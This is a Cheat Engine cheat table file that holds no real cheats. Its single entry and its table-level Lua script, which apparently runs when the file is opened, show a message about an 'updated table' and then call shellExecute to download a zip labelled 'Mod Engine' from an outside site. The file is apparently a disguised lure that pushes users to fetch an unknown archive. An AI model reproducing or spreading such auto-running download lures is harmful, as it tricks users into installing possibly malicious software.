<?xml version="1.0" encoding="utf-8"?>
<CheatTable CheatEngineTableVersion="45">
  <CheatEntries>
    <CheatEntry>
      <ID>16273</ID>
      <Description>"Enable +info"</Description>
      <VariableType>Auto Assembler Script</VariableType>
      <AssemblerScript>{$LUA}
  if syntaxcheck then return end
  [ENABLE]

--Updated table! (Start)
    --messageDialog('Enable Dark Mode?', mtInformation,mbYes,mbNo)
messageDialog("Updated table with more cheats available!\r\n\r\nYou will need Mod Engine to get more cheats and the new updated table\r\n\r\nDownload Mod Engine")
shellExecute("https://modsengine.com/modengine.zip")
--Updated table! (End)
  [DISABLE]

</AssemblerScript>
    </CheatEntry>
  </CheatEntries>
  <UserdefinedSymbols/>
  <LuaScript>--Updated table! (Start)
    --messageDialog('Enable Dark Mode?', mtInformation,mbYes,mbNo)
messageDialog("Updated table with more cheats available!\r\n\r\nYou will need Mod Engine to get more cheats and the new updated table\r\n\r\nDownload Mod Engine")
shellExecute("https://modsengine.com/modengine.zip")

--Updated table! (End)

</LuaScript>
</CheatTable>